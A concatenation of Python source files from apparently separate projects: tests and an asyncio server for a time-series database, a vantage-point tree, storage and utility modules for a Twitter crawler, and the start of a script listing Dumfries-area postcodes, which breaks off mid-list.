assert(server.port == 9999)
t1 = [0,1,2,3,4]
v1 = [1.0,2.0,3.0,2.0,1.0]
ats1 = ts.TimeSeries(t1, v1)
t2 = [10,11,12,13,14]
v2 = [-1.0,-2.0,-3.0,-2.0,-1.0]
ats2 = ts.TimeSeries(t2, v2)
# Test TSDBOp_InsertTS
insert_op = {}
insert_op['pk'] = 1
insert_op['ts'] = ats1
insert_op['op'] = 'insert_ts'
InsertedTS = TSDBOp_InsertTS(1, ats1)
assert(insert_op == InsertedTS)
# Test Protocol Insert
insert_return = prot._insert_ts(insert_op)
assert(insert_return['op'] == 'insert_ts')
assert(insert_return['status'] == TSDBStatus.OK)
assert(insert_return['payload'] == None)
inserted_row = server.db.rows[1]
assert(inserted_row['pk'] == 1)
assert(inserted_row['ts'] == ats1)
# Add some more data
prot._insert_ts(TSDBOp_InsertTS(2, ats1))
inserted_row = server.db.rows[2]
assert(inserted_row['ts'] == ats1)
# Test Protocol Upsert
upserted_meta = TSDBOp_UpsertMeta(2, {'ts': ats2, 'order': 1})
upsert_return = prot._upsert_meta(upserted_meta)
assert(upsert_return['op'] == 'upsert_meta')
assert(upsert_return['status'] == TSDBStatus.OK)
assert(upsert_return['payload'] == None)
# Test Protocol Select (None fields)
metadata_dict = {'pk': {'>': 0}}
fields = None
additional = None
select_op = TSDBOp_Select(metadata_dict, fields, additional)
select_return = prot._select(select_op)
print("Here", select_return)
assert(select_return['op'] == 'select')
assert(select_return['status'] == TSDBStatus.OK)
assert(select_return['payload'][1] == {})
assert(select_return['payload'][2] == {})
# Test Protocol Select
metadata_dict = {'pk': {'>': 0}}
fields = ['ts']
additional = None
select_op = TSDBOp_Select(metadata_dict, fields, additional)
select_return = prot._select(select_op)
assert(select_return['op'] == 'select')
assert(select_return['status'] == TSDBStatus.OK)
assert(select_return['payload'][1]['ts'] == ats1)
assert(select_return['payload'][2]['ts'] == ats2)
# Test Add Trigger
add_trigger_op = TSDBOp_AddTrigger('stats', 'insert_ts', ['mean', 'std'], None)
prot._add_trigger(add_trigger_op)
mod = import_module('procs.stats')
storedproc = getattr(mod,'main')
assert(server.triggers['insert_ts'] == [('stats', storedproc, None, ['mean', 'std'])])
#prot._insert_ts(TSDBOp_InsertTS(3, ats1))
#time.sleep(1)
#inserted_row = server.db.rows[3]
#assert(inserted_row['mean'] == ats1)
#assert(inserted_row['std'] == ats1)
def test_protocol_delete(self):
db = DictDB(schema, 'pk')
server = TSDBServer(db)
prot = TSDBProtocol(server)
t1 = [0,1,2,3,4]
v1 = [1.0,2.0,3.0,2.0,1.0]
ats1 = ts.TimeSeries(t1, v1)
t2 = [10,11,12,13,14]
v2 = [-1.0,-2.0,-3.0,-2.0,-1.0]
ats2 = ts.TimeSeries(t2, v2)
insert_op = {}
insert_op['pk'] = 1
insert_op['ts'] = ats1
insert_op['op'] = 'insert_ts'
# Test Protocol Insert
insert_return = prot._insert_ts(insert_op)
assert(insert_return['op'] == 'insert_ts')
assert(insert_return['status'] == TSDBStatus.OK)
assert(insert_return['payload'] == None)
inserted_row = server.db.rows[1]
assert(inserted_row['pk'] == 1)
assert(inserted_row['ts'] == ats1)
insert_return2 = prot._insert_ts(insert_op)
assert(insert_return2['op'] == 'insert_ts')
assert(insert_return2['status'] == TSDBStatus.INVALID_KEY)
delete_op = {}
delete_op['pk'] = 1
delete_op['op'] = 'delete_ts'
delete_return = prot._delete_ts(delete_op)
assert(delete_return['op'] == 'delete_ts')
assert(delete_return['status'] == TSDBStatus.OK)
assert(delete_return['payload'] == None)
assert (len(server.db.rows) == 0)
delete_return2 = prot._delete_ts(delete_op)
assert(delete_return2['op'] == 'delete_ts')
assert(delete_return2['status'] == TSDBStatus.INVALID_KEY)
def test_protocol_triggers(self):
db = DictDB(schema, 'pk')
server = TSDBServer(db)
prot = TSDBProtocol(server)
# Test Add Trigger
add_trigger_op = TSDBOp_AddTrigger('stats', 'insert_ts', ['mean', 'std'], None)
prot._add_trigger(add_trigger_op)
mod = import_module('procs.stats')
storedproc = getattr(mod,'main')
assert(server.triggers['insert_ts'] == [('stats', storedproc, None, ['mean', 'std'])])
# Test delete Trigger
delete_trigger_op = TSDBOp_RemoveTrigger('stats', 'insert_ts')
prot._remove_trigger(delete_trigger_op)
mod = import_module('procs.stats')
storedproc = getattr(mod,'main')
assert(server.triggers['insert_ts'] == [])
def test_augmented_select(self):
db = DictDB(schema, 'pk')
server = TSDBServer(db)
prot = TSDBProtocol(server)
t1 = [0,1,2,3,4]
v1 = [1.0,2.0,3.0,2.0,1.0]
ats1 = ts.TimeSeries(t1, v1)
t2 = [10,11,12,13,14]
v2 = [-1.0,-2.0,-3.0,-2.0,-1.0]
ats2 = ts.TimeSeries(t2, v2)
insert_op = {}
insert_op['pk'] = 1
insert_op['ts'] = ats1
insert_op['op'] = 'insert_ts'
# Test Protocol Insert
insert_return = prot._insert_ts(insert_op)
assert(insert_return['op'] == 'insert_ts')
assert(insert_return['status'] == TSDBStatus.OK)
assert(insert_return['payload'] == None)
inserted_row = server.db.rows[1]
assert(inserted_row['pk'] == 1)
assert(inserted_row['ts'] == ats1)
# Test Protocol Select (None fields)
metadata_dict = {'pk': {'>': 0}}
fields = None
additional = None
aug_select_op = TSDBOp_AugmentedSelect('corr', ['mean', 'std'], [t2,v2], metadata_dict, additional )
aug_select_return = prot._augmented_select(aug_select_op)
assert(aug_select_return['op'] == 'augmented_select')
assert(aug_select_return['status'] == TSDBStatus.OK)
assert(aug_select_return['payload'] == {1: {'mean': 1.4142135623730403}})
```
#### File: tests/vptree/test_VPtrees.py
```python
from vptree import *
import numpy as np
data = np.random.rand(200)
dataDict = {}
for i in range(len(data)):
dataDict['key'+str(i+1)] = data[i]
allPk = list(dataDict.keys())
testvps = ['key7', 'key10', 'key45', 'key73']
#creating distance function
def absdist(VP,allPk):
"""
Implementing basic absolute distance function
"""
x = dataDict[VP]
y = np.array([dataDict[key] for key in allPk])
return np.abs(x-y)
tree = VPtree(allPk, testvps, absdist)
vpt = tree.gen_graph()
def dist(vp,arg):
x = dataDict[vp]
return np.abs(x-arg)
search_val = np.random.normal(0,5)
allDists = np.array([np.abs(search_val - dataDict[p]) for p in allPk])
subset = tree.gen_subset(search_val,dist)
closest = min(allPk, key = lambda k:allDists[allPk.index(k)])
assert closest in subset
```
#### File: cs207project/tsdb/tsdb_server.py
```python
import asyncio
from .dictdb import DictDB
from importlib import import_module
from collections import defaultdict, OrderedDict
from .tsdb_serialization import Deserializer, serialize
from .tsdb_error import *
from .tsdb_ops import *
import procs
import json
import ast
from aiohttp import web
def trigger_callback_maker(pk, target, calltomake):
def callback_(future):
result = future.result()
if target is not None:
calltomake(pk, dict(zip(target, result)))
return result
return callback_
class TSDBProtocol(asyncio.Protocol):
def __init__(self, server):
self.server = server
self.deserializer = Deserializer()
self.futures = []
def _insert_ts(self, op):
try:
self.server.db.insert_ts(op['pk'], op['ts'])
except ValueError as e:
return TSDBOp_Return(TSDBStatus.INVALID_KEY, op['op'])
self._run_trigger('insert_ts', [op['pk']])
return TSDBOp_Return(TSDBStatus.OK, op['op'])
def _delete_ts(self, op):
try:
self.server.db.delete_ts(op['pk'])
except ValueError as e:
return TSDBOp_Return(TSDBStatus.INVALID_KEY, op['op'])
self._run_trigger('delete_ts', [op['pk']])
return TSDBOp_Return(TSDBStatus.OK, op['op'])
def _upsert_meta(self, op):
self.server.db.upsert_meta(op['pk'], op['md'])
self._run_trigger('upsert_meta', [op['pk']])
return TSDBOp_Return(TSDBStatus.OK, op['op'])
def _select(self, op):
loids, fields = self.server.db.select(op['md'], op['fields'], op['additional'])
self._run_trigger('select', loids)
if fields is not None:
d = OrderedDict(zip(loids, fields))
return TSDBOp_Return(TSDBStatus.OK, op['op'], d)
else:
d = OrderedDict((k,{}) for k in loids)
return TSDBOp_Return(TSDBStatus.OK, op['op'], d)
def _augmented_select(self, op):
"run a select and then synchronously run some computation on it"
loids, fields = self.server.db.select(op['md'], None, op['additional'])
proc = op['proc'] # the module in procs
arg = op['arg'] # an additional argument, could be a constant
target = op['target'] #not used to upsert any more, but rather to
# return results in a dictionary with the targets mapped to the return
# values from proc_main
mod = import_module('procs.'+proc)
storedproc = getattr(mod,'proc_main')
results=[]
for pk in loids:
row = self.server.db.rows[pk]
result = storedproc(pk, row, arg)
results.append(dict(zip(target, result)))
return TSDBOp_Return(TSDBStatus.OK, op['op'], dict(zip(loids, results)))
def _add_trigger(self, op):
print('Adding triggers')
trigger_proc = op['proc'] # the module in procs
trigger_onwhat = op['onwhat'] # on what? eg `insert_ts`
trigger_target = op['target'] # if provided, this meta will be upserted
trigger_arg = op['arg'] # an additional argument, could be a constant
# FIXME: this import should have error handling
mod = import_module('procs.'+trigger_proc)
storedproc = getattr(mod,'main')
self.server.triggers[trigger_onwhat].append((trigger_proc, storedproc, trigger_arg, trigger_target))
return TSDBOp_Return(TSDBStatus.OK, op['op'])
def _remove_trigger(self, op):
trigger_proc = op['proc']
trigger_onwhat = op['onwhat']
trigs = self.server.triggers[trigger_onwhat]
for t in trigs:
if t[0]==trigger_proc:
trigs.remove(t)
return TSDBOp_Return(TSDBStatus.OK, op['op'])
def _run_trigger(self, opname, rowmatch):
lot = self.server.triggers[opname]
print("S> list of triggers to run", lot)
for tname, t, arg, target in lot:
for pk in rowmatch:
row = self.server.db.rows[pk]
task = asyncio.ensure_future(t(pk, row, arg))
task.add_done_callback(trigger_callback_maker(pk, target, self.server.db.upsert_meta))
def connection_made(self, conn):
print('S> connection made')
self.conn = conn
def data_received(self, data):
print('S> data received ['+str(len(data))+']: '+str(data))
self.deserializer.append(data)
if self.deserializer.ready():
msg = self.deserializer.deserialize()
status = TSDBStatus.OK # until proven otherwise.
response = TSDBOp_Return(status, None) # until proven otherwise.
try:
op = TSDBOp.from_json(msg)
except TypeError as e:
response = TSDBOp_Return(TSDBStatus.INVALID_OPERATION, None)
if status is TSDBStatus.OK:
if isinstance(op, TSDBOp_InsertTS):
response = self._insert_ts(op)
elif isinstance(op, TSDBOp_DeleteTS):
response = self._delete_ts(op)
elif isinstance(op, TSDBOp_UpsertMeta):
response = self._upsert_meta(op)
elif isinstance(op, TSDBOp_Select):
response = self._select(op)
elif isinstance(op, TSDBOp_AddTrigger):
response = self._add_trigger(op)
elif isinstance(op, TSDBOp_RemoveTrigger):
response = self._remove_trigger(op)
else:
response = TSDBOp_Return(TSDBStatus.UNKNOWN_ERROR, op['op'])
self.conn.write(serialize(response.to_json()))
self.conn.close()
def connection_lost(self, transport):
print('S> connection lost')
def rest_hello_world(self, request):
return web.Response(body=b"Hello world")
#@rest_handler
@asyncio.coroutine
def post_handler(self, request):
data = yield from request.json()
status = TSDBStatus.OK # until proven otherwise.
response = TSDBOp_Return(status, None) # until proven otherwise.
msg = data
try:
op = TSDBOp.from_json(msg)
except TypeError as e:
response = TSDBOp_Return(TSDBStatus.INVALID_OPERATION, None)
if status is TSDBStatus.OK:
if isinstance(op, TSDBOp_InsertTS):
response = self._insert_ts(op)
elif isinstance(op, TSDBOp_DeleteTS):
response = self._delete_ts(op)
elif isinstance(op, TSDBOp_UpsertMeta):
response = self._upsert_meta(op)
elif isinstance(op, TSDBOp_Select):
response = self._select(op)
elif isinstance(op, TSDBOp_AddTrigger):
response = self._add_trigger(op)
elif isinstance(op, TSDBOp_RemoveTrigger):
response = self._remove_trigger(op)
else:
response = TSDBOp_Return(TSDBStatus.UNKNOWN_ERROR, op['op'])
return web.json_response(response.to_json())
class TSDBServer(object):
def __init__(self, db, port=9999):
self.port = port
self.db = db
self.triggers = defaultdict(list)
self.autokeys = {}
def exception_handler(self, loop, context):
print('S> EXCEPTION:', str(context))
loop.stop()
def run(self, testing=False):
loop = asyncio.get_event_loop()
# NOTE: enable this if you'd rather have the server stop on an error
# currently it dumps the protocol and keeps going; new connections
# are unaffected. Rather nice, actually.
#loop.set_exception_handler(self.exception_handler)
self.listener = loop.create_server(lambda: TSDBProtocol(self), '127.0.0.1', self.port)
print('S> Starting TSDB server on port',self.port)
listener = loop.run_until_complete(self.listener)
try:
loop.run_forever()
except KeyboardInterrupt:
print('S> Exiting.')
except Exception as e:
print('S> Exception:',e)
finally:
listener.close()
loop.close()
def rest_run(self):
loop = asyncio.get_event_loop()
app = web.Application()
tsdbproc = TSDBProtocol(self)
app.router.add_route('GET', '/', tsdbproc.rest_hello_world)
app.router.add_route('POST', '/', tsdbproc.post_handler)
self.listener = loop.create_server(app.make_handler(), '127.0.0.1', self.port)
print('S> Starting REST TSDB server on port',self.port)
listener = loop.run_until_complete(self.listener)
try:
loop.run_forever()
except KeyboardInterrupt:
print('S> Exiting.')
except Exception as e:
print('S> Exception:',e)
finally:
listener.close()
loop.close()
if __name__=='__main__':
empty_schema = {'pk': {'convert': lambda x: x, 'index': None}}
db = DictDB(empty_schema, 'pk')
TSDBServer(db).run()
```
#### File: cs207project/vptree/vptree.py
```python
import uuid
import numpy as np
import graphviz as gv
class vpnode():
def __init__(self):
self.parent = None
self.leftChild = None
self.rightChild = None
#Using preorder in a similar way as the lab
#returns a list and not a generator object
def preorder(self):
if self.rightChild == None and self.leftChild == None:
return [(self, None, None)]
else:
return [(self, self.leftChild, self.rightChild)] + self.leftChild.preorder() + self.rightChild.preorder()
#Since a VP tree has two kind of nodes - non-leaf nodes with vantage points and leaf nodes with closest possible candidates.
class vpnodeVP(vpnode):
"""
Intermediate nodes with vantage points
"""
def __init__(self, uid, pk, median, leftChild, rightChild):
"""
pk - future input from timeseries
- currently the id for the test timeseries
"""
#Inheriting from the base class
super().__init__()
self.uid = uid
self.pk = pk
self.median = median
self.leftChild = leftChild
self.rightChild = rightChild
class vpnodeLeaf(vpnode):
"""
Leaf nodes with primary key lists with the closest matches
"""
def __init__(self, uid, pkList):
super().__init__()
self.uid = uid
self.pkList = pkList
#Building the tree class
class VPtree():
"""
Main tree class
"""
def __init__(self, allPk, vpList, dfunc):
"""
allPK - List of all primary keys
vpList - List of vantage points
dfunc - distance function
"""
self.vpList = vpList
self.dfunc = dfunc
self.root = self.maketree(allPk, vpList)
def maketree(self, allPk, vpList):
#Making an id for the node:
uid = uuid.uuid4().int % 10000
#checking if there are vantage points left
#if we have none left, its just the vpnodeLeaf node
if vpList == []:
return vpnodeLeaf(uid, allPk)
else:
#Decide how to pick vantage point
#Currently using random selection
index = np.random.choice(range(len(vpList)))
VP = vpList[index]
#Computing distance for all points
VPdist = self.dfunc(VP, allPk)
median = np.median(VPdist)
#Assigning if left or right
#initializing empty lists
left_PK, left_VP, right_PK, right_VP = [], [], [], []
for key, dist in zip(allPk, VPdist):
if dist < median : #assigning left
left_PK.append(key)
if key in vpList and key != VP:
#add the key to vantage key list
left_VP.append(key)
else:
right_PK.append(key)
if key in vpList and key != VP:
#add key to vantage key list
right_VP.append(key)
leftChild = self.maketree(left_PK, left_VP)
rightChild = self.maketree(right_PK, right_VP)
#creating root node
node = vpnodeVP(uid, VP, median, leftChild, rightChild)
#setting parents
rightChild.parent = node
leftChild.parent = node
return node
def gen_graph(self):
"""
Visualize the tree
"""
graph = gv.Digraph(format='svg')
for parent, leftChild, rightChild in self.root.preorder():
if isinstance(parent,vpnodeLeaf):
graph.node(str(parent.uid), "Leaf:: "+str(parent.pkList))
if isinstance(parent,vpnodeVP):
graph.node(str(parent.uid), """Vantage point:: Key={} medianDist = {:3.3f}
""".format(parent.pk, parent.median))
graph.edge(str(parent.uid), str(leftChild.uid))
graph.edge(str(parent.uid), str(rightChild.uid))
return graph
def gen_subset(self, search_val, dfunc):
"""Get the subset of nodes that can be the closest to this argument
INPUT
search_val - search value
dfunc - distance function
"""
current = self.root
while not isinstance(current,vpnodeLeaf):
d = dfunc(current.pk, search_val)
if d > current.median:
current = current.rightChild
else:
current = current.leftChild
return current.pkList
"""
if __name__ == "__main__":
data = np.random.rand(200)
dataDict = {}
for i in range(len(data)):
dataDict['key'+str(i+1)] = data[i]
allPk = list(dataDict.keys())
testvps = ['key7', 'key10', 'key45', 'key73']
#creating distance function
def absdist(VP,allPk):
#Implementing basic absolute distance function
x = dataDict[VP]
y = np.array([dataDict[key] for key in allPk])
return np.abs(x-y)
tree = VPtree(allPk, testvps, absdist)
vpt = tree.gen_graph()
vpt.render("vptree.gv")
def dist(vp,arg):
x = dataDict[vp]
return np.abs(x-arg)
search_val = np.random.normal(0,5)
allDists = np.array([np.abs(search_val - dataDict[p]) for p in allPk])
subset = tree.gen_subset(search_val,dist)
closest = min(allPk, key = lambda k:allDists[allPk.index(k)])
assert closest in subset
"""
``` |
{
"source": "2087829p/smores",
"score": 3
} |
#### File: smores/smores/storage.py
```python
__author__ = '<NAME>'
import os
import pickle
import time
import threading
import constants
from concurrent import futures
import Queue
def __abs_path__(fl):
curr_dir = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
abs_file_path = os.path.join(curr_dir, fl)
return abs_file_path
def load_data(f):
data = []
file_path = __abs_path__(f)
if not os.path.exists(file_path):
open(file_path, 'w+').close()
return data
with open(file_path, 'rb') as handle:
try:
data = pickle.load(handle)
except Exception as e:
print "error while opening file " + f + ' cause: ' + e.message
return data
def save_data(data, fl, append=False):
if constants.TESTING:
return
file_path = __abs_path__(fl)
if not os.path.exists(os.path.dirname(file_path)):
try:
os.makedirs(os.path.dirname(file_path))
except:
print "could not create missing directory"
return
if append:
data += load_data(fl)
with open(file_path, 'wb') as handle:
try:
pickle.dump(data, handle)
except Exception as e:
print "could not save data to file %s cause: %s" % (fl,e.message)
def load_explorer_data():
import constants as c
bulk_lists=load_data(c.TWITTER_BULK_LIST_STORAGE)
lists = load_data(c.TWITTER_LIST_STORAGE)
users = load_data(c.TWITTER_USER_STORAGE)
remaining = load_data(c.TWITTER_CANDIDATES_STORAGE)
data={'remaining':remaining if remaining else[],
'bulk_lists': bulk_lists if bulk_lists else [],
'total_followed': users if users else [],
'user_lists': lists if lists else []}
return data
class Format_Error(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
def read_login(f):
data = []
file_path = __abs_path__(f)
if not os.path.exists(file_path):
open(file_path, 'w').close()
return data
with open(file_path, 'r') as handle:
content = handle.readlines()
for l in content:
data_entry = {}
l = l.strip('\n')
l = l.strip("[]")
entry = l.split(',')
for e in entry:
d = e.split(":")
if (len(d) != 2):
raise Format_Error("Unable to parse credentials file due to error in formatting")
data_entry[d[0]] = d[1]
data.append(data_entry)
return data
def save_candidates(candidates):
save_data(candidates,constants.TWITTER_CANDIDATES_STORAGE)
# 1 db per day
# 1 collection per hour
# as many tweets as possible aka documents
# if time == available then https://www.sitepoint.com/caching-a-mongodb-database-with-redis/
class StorageSystem:
def __init__(self, ip, port, thread_count):
self.ip = ip
self.port = port
self._current_db = time.strftime("%x") # sets the name of the current db to the current date
self._current_collection = time.strftime(
"%X") # set the current collection to the current time aka current hour
self._pool = futures.ThreadPoolExecutor(max_workers=thread_count)
# NEVER TO BE CALLED BY ANYONE BUT SCHEDULER
def switch_db_context(self):
self._current_db = time.strftime("%x")
# TO BE USED ONLY FOR TESTING
def set_db_context(self, c):
self._current_db = c
# NOT TO BE CALLED BY USER MUST BE CALLED ONLY BY SCHEDULER
def switch_collection_context(self):
self._current_collection = time.strftime("%X")
def __perform_write__(self, data, ip, port, **kwargs):
'Write the new data to the specified server'
import pymongo
try:
mongo = pymongo.MongoClient(ip, port)
db = mongo[kwargs['current_db']]
db[kwargs['current_collection']].insert_many(data, False)
mongo.close()
except:
raise ValueError('MongoDB server ' + ip + ':' + str(port)
+ ' endpoint data is incorrect or server is down')
def write(self, data):
'Enqueue data that the storage system will attempt to save'
self._pool.submit(self.__perform_write__,
data, self.ip,
self.port,
current_db=self._current_db,
current_collection=self._current_collection)
def shutdown(self):
print "Storage system is shutting down please wait for all pending IO tasks to complete"
self._pool.shutdown(True)
# http://www.bogotobogo.com/python/Multithread/python_multithreading_Synchronization_Condition_Objects_Producer_Consumer.php
class Filter(threading.Thread):
# service used to specify which task should results should be fed to filter refer to service plugins in constants.py
def __init__(self, service, store, filters):
threading.Thread.__init__(self)
self._for = service
self._data = Queue.Queue()
self._store = store
self._plugins = filters
self._cond = threading.Condition()
self._lock = threading.Lock()
self.daemon = True
self._running = True
# self.start()
def set_store(self, store):
self._store = store
def data_available(self, data):
'Notify the plugin that new data is available for processing'
self._data.put(data)
with self._lock:
with self._cond:
self._cond.notify()
def start(self):
threading.Thread.start(self)
if not self._plugins:
return
for p in self._plugins:
p.start()
def interrupt(self):
'Terminate plugin and its pipeline'
with self._lock:
self._running = False
with self._cond:
self._cond.notify()
if self._plugins:
for p in self._plugins:
p.interrupt()
def register_plugin(self, p):
'Add new plugin to the end of the pipeline'
if isinstance(p, Filter):
self._plugins.append(p)
def run(self):
while self._running:
while self._data:
data = self.process(self._data.get())
self._data.task_done()
if self._store:
self._store(data)
if self._plugins:
for p in self._plugins:
p.data_available(data)
self._cond.wait()
def process(self, data):
'Processes the input data must be overridden and implemented in every class that subclasses this one'
raise NotImplementedError()
```
#### File: smores/smores/utils.py
```python
__author__ = '<NAME>'
import threading
import numpy as np
from constants import *
import math
import time
import constants as c
def split_into(l, n):
'Splits the list into smaller lists with n elements each'
for i in xrange(0, len(l), n):
yield l[i:i + n]
def fit_in_range(min, max, x):
"""fits a number(x) within a specified range between min and max"""
return (x - min) / (max - min)
# coverts twitter timestamp to system time in seconds since Unix epoch
get_tweet_timestamp = lambda t:time.mktime(time.strptime(t["created_at"], "%a %b %d %H:%M:%S +0000 %Y"))
# flattens a multidimensional array into a 1-dimensional array
flatten = lambda l: [i for sl in l for i in sl]
# removes Twitter accounts that are protected or have to few tweets to be deemed active
user_filter = lambda x:filter(lambda y:y['protected']==False and y['statuses_count']>c.MIN_TWITTER_STATUSES_COUNT,x)
# a handy functional expression to check if the trends data is data or list of locations for which we want trends
contains_locations = lambda x: isinstance(x, list) and any(
[('location' in i or 'woeid' in i or 'lat' in i or 'long' in i) for i in x])
# determines whether a string contains only ascii characters
all_ascii = lambda x:all(ord(c) < 128 for c in x)
class KMeanClassifier:
def __init__(self):
self._pos = [1.0 for _ in xrange(RUNNING_CYCLE)]
self._pos_size = 0
self._neg = [1.0 for _ in xrange(RUNNING_CYCLE)]
self._neg_size = 0
def train(self, s, r): #s-sample,r-result what we've actually observed
s = np.log(s)
if r == 1:
# train positive classifier
self._pos_size += 1
self._pos = map(lambda m, x: m + ((x - m) / self._pos_size), self._pos, s)
else:
# train negative classifier
self._neg_size += 1
self._neg = map(lambda m, x: m + ((x - m) / self._neg_size), self._neg, s)
def __dist__(self, x, y):
return np.sqrt((x - y) ** 2)
def predict(self, s):
s = np.log(s)
gamma = 1.0
return np.mean([math.exp(-gamma * d) for d in map(self.__dist__, s, self._pos)]) \
/ np.mean([math.exp(-gamma * d) for d in map(self.__dist__, s, self._neg)])
class NeuralNetwork:
def __init__(self, num_inputs, num_outputs,mlp=False):
self._size_in = num_inputs
self._size_out = num_outputs
if not mlp:
self._w = [self.__gen_layer__(num_inputs,num_outputs)]
self._setup = True
else:
self._setup = False
self._w = []
def __gen_layer__(self, in_size, out_size):
return 2 * np.random.random((in_size, out_size)) - 1
def add_hidden_layer(self, num_neurons):
if not self._w:
self._w.append(self.__gen_layer__(self._size_in, num_neurons))
else:
self._w.append(self.__gen_layer__(self._w[-1].shape[1], num_neurons))
def __sigmoid__(self, x, deriv=False):
if (deriv == True):
return x * (1 - x)
return 1 / (1 + np.exp(-x))
def train(self, X, y, epochs=1): #X-input,y-observed result
if not self._w:
self._w.append(self.__gen_layer__(self._size_in, self._size_out))
self._setup = True
elif not self._setup:
self._w.append(self.__gen_layer__(self._w[-1].shape[1], self._size_out))
self._setup = True
for i in xrange(epochs):
# propagate forward
l0 = X
l1 = [l0]
for l in range(len(self._w)):
l0 = self.__sigmoid__(np.dot(l0, self._w[l]))
l1.append(l0)
err = y - l0 #calculate error
delta = err * self.__sigmoid__(l0, True)#calculate the gradient of the error for the output layer
if len(self._w) > 1:
self._w[-1] += l0.T.dot(delta) #update the output layer's weights
for j in xrange(len(self._w) - 2, 0, -1):
l_err = delta.dot(self._w[j+1].T)#calculate the error for each layer going backwards
l_delta = l_err * self.__sigmoid__(l1[j], deriv=True)#calculate the gradient
self._w[j] += l1[j].T.dot(l_delta)#update the weight
delta = l_delta # remember the gradient so we can use it in the next epoch
else:
self._w[-1] += np.dot(l0.T, delta)
def predict(self, X):
lo = X
for l in xrange(len(self._w)):
lo = self.__sigmoid__(np.dot(lo, self._w[l]))
return lo
class CrawlTimer(threading.Thread):
# ref:http://stackoverflow.com/questions/9812344/cancellable-threading-timer-in-python
def __init__(self, wait_for, function, **kwargs):
threading.Thread.__init__(self)
self.event = threading.Event()
self.fs = [(function, kwargs)] if function else []
self.timeout = wait_for
def add_function(self, f, **kwargs):
self.fs.append((f, kwargs))
def run(self):
while not self.event.is_set():
for i in range(len(self.fs)):
fx = self.fs[i]
if fx[1]:
fx[0](fx[1])
else:
fx[0]()
self.event.wait(self.timeout)
def stop(self):
self.event.set()
``` |
{
"source": "2090886l/IneqBench",
"score": 3
} |
#### File: IneqBench/TaxBands-Data-and-Script/script.py
```python
import urllib.request
import re
import csv
array = """DG1 1DF
DG1 1DG
DG1 1DJ
DG1 1DL
DG1 1DR
DG1 1DT
DG1 1DU
DG1 1DX
DG1 1EA
DG1 1EB
DG1 1ED
DG1 1EF
DG1 1EG
DG1 1EH
DG1 1EJ
DG1 1EL
DG1 1ET
DG1 1EW
DG1 1EX
DG1 1FA
DG1 1GL
DG1 1GN
DG1 1GP
DG1 1GQ
DG1 1GZ
DG1 1AA
DG1 1AG
DG1 1BA
DG1 1BD
DG1 1BF
DG1 1BG
DG1 1BH
DG1 1BJ
DG1 1BL
DG1 1BS
DG1 1BT
DG1 1BU
DG1 1BW
DG1 1BX
DG1 1BY
DG1 1BZ
DG1 1DA
DG1 1DB
DG1 1DD
DG1 1DE
DG1 1HA
DG1 1HB
DG1 1HD
DG1 1HE
DG1 1HF
DG1 1HH
DG1 1HJ
DG1 1HL
DG1 1HN
DG1 1HP
DG1 1HR
DG1 1HS
DG1 1HU
DG1 1HW
DG1 1HX
DG1 1HY
DG1 1HZ
DG1 1JA
DG1 1JB
DG1 1JD
DG1 1JE
DG1 1JF
DG1 1JG
DG1 1JL
DG1 1JN
DG1 1JP
DG1 1JQ
DG1 1JR
DG1 1JU
DG1 1JW
DG1 1JX
DG1 1JY
DG1 1JZ
DG1 1LG
DG1 1LN
DG1 1LP
DG1 1LR
DG1 1LS
DG1 1LT
DG1 1LU
DG1 1LW
DG1 1LX
DG1 1LZ
DG1 1NA
DG1 1NE
DG1 1NF
DG1 1NH
DG1 1NJ
DG1 1NL
DG1 1NN
DG1 1NP
DG10 9NT
DG10 9NU
DG10 9NW
DG10 9NX
DG10 9PA
DG10 9PB
DG10 9PD
DG10 9PE
DG10 9PF
DG10 9PG
DG10 9PH
DG10 9PJ
DG10 9PL
DG10 9PN
DG10 9PP
DG10 9PQ
DG10 9PR
DG10 9PS
DG10 9PT
DG10 9PU
DG10 9PW
DG10 9PX
DG10 9PY
DG10 9PZ
DG10 9QA
DG10 9QB
DG10 9QF
DG10 9QG
DG10 9QH
DG10 9QJ
DG1 1NQ
DG1 1NR
DG1 1NS
DG1 1NT
DG1 1NW
DG1 1NY
DG1 1NZ
DG1 1PA
DG1 1PB
DG1 1PD
DG1 1PE
DG1 1PF
DG1 1PG
DG1 1PJ
DG1 1PL
DG1 1PP
DG1 1PW
DG1 1PX
DG1 1PZ
DG1 1QA
DG1 1QB
DG1 1QD
DG1 1QE
DG1 1QF
DG1 1QG
DG1 1QH
DG1 1QJ
DG1 1QL
DG1 1QN
DG1 1QP
DG1 1QQ
DG1 1QR
DG1 1QS
DG1 1QU
DG1 1QW
DG1 1QX
DG1 1QY
DG1 1QZ
DG1 1RA
DG1 1RB
DG1 1RD
DG1 1RE
DG1 1RF
DG1 1RG
DG1 1RH
DG1 1RJ
DG1 1RL
DG1 1RN
DG1 1RP
DG1 1RQ
DG1 1RR
DG1 1RS
DG1 1RT
DG1 1RU
DG1 1RX
DG1 1RY
DG1 1RZ
DG1 1SA
DG1 1SD
DG1 1SE
DG1 1SF
DG1 1SG
DG1 1SH
DG1 1SJ
DG1 1SL
DG1 1SP
DG1 1SQ
DG1 1SR
DG1 1SS
DG1 1ST
DG1 1SU
DG1 1SW
DG1 1SX
DG1 1SY
DG1 1SZ
DG1 1TA
DG1 1TB
DG1 1TD
DG1 1TE
DG1 1TF
DG1 1TG
DG1 1TH
DG1 1TN
DG1 1TP
DG1 1TQ
DG1 1TR
DG1 1TS
DG1 1TT
DG1 1TU
DG1 1TW
DG1 1TX
DG1 1TY
DG1 1TZ
DG1 1UA
DG1 1UB
DG1 1UD
DG1 1UF
DG1 1UG
DG1 1UH
DG1 1UJ
DG1 1UL
DG1 1UN
DG1 1UP
DG1 1UQ
DG1 1UR
DG1 1US
DG1 1UT
DG1 1UU
DG1 1UW
DG1 1UX
DG1 1UY
DG1 1UZ
DG1 1WD
DG1 1XA
DG1 1XB
DG1 1XD
DG1 1XE
DG1 1XF
DG1 1XG
DG1 1XH
DG1 1XJ
DG1 1XL
DG1 1XN
DG1 1XP
DG1 1XQ
DG1 1XR
DG1 1XS
DG1 1XW
DG1 2AA
DG1 2AB
DG1 2AD
DG1 2AG
DG1 2AH
DG1 2AL
DG1 2AN
DG1 2AP
DG1 2AT
DG1 2AW
DG1 2AX
DG1 2BA
DG1 2BD
DG1 2BG
DG1 2BH
DG1 2BJ
DG1 2BN
DG1 2BQ
DG1 2BS
DG1 2BT
DG1 2BU
DG1 2BY
DG1 2DA
DG1 2DB
DG1 2DD
DG1 2DE
DG1 2DF
DG1 2DL
DG1 2DN
DG1 2DP
